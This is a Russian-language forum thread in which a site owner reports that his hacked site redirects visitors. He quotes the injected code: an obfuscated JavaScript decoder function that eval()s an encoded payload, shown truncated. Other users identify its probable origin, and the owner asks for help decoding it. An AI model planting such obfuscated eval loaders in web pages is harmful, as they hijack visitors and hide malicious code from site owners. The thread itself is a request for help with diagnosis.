Непонятный редирект

Статус
В этой теме нельзя размещать новые ответы.

IduKuru

Местный житель
Регистрация
20 Янв 2008
Сообщения
150
Реакции
20
зашел сегодня на свой заброшенный сайт и вдруг меня редиректит на ya.ru видно поломал меня кто-то. Начал смотреть код а там зашифрованный скрипт редиректа на js выполненный через функциию xubban

что вообще за функция такая что про нее даже google не знает?
 
это краснокнопочный редик, по крайней мере он таким же способом генерит js редиректы - просто создаёт randomname.js с кодом, а через "функцию" передаёт этому файлу параметры редика, читай ключи ;)
 
randomname.js не было была только строчка в <body>

<script language=JavaScript>function xubban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,7,16,13....26,39,1);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(209^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}xubban('vJM8bTC......hP')</script>

еще папка smarty появилась с php скриптами грохнул к сожалению не глянув что за скрипты
 
:ah: Сие один в один результат работы разновидности опубликованного мной ранее скрипта в теме "Зашивровать html с помощью javascript":

Для просмотра ссылки Войди или Зарегистрируйся

Там же можно и расшифровщик сделать из исходного скрипта...

P.S. однако народ у нас быстро использует всякие "полезные вещи"... кстати - я вас не ломал ... :nezn:
 
а может поможете расшифрощик сделать а то ни ка не в курю как это сделать
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху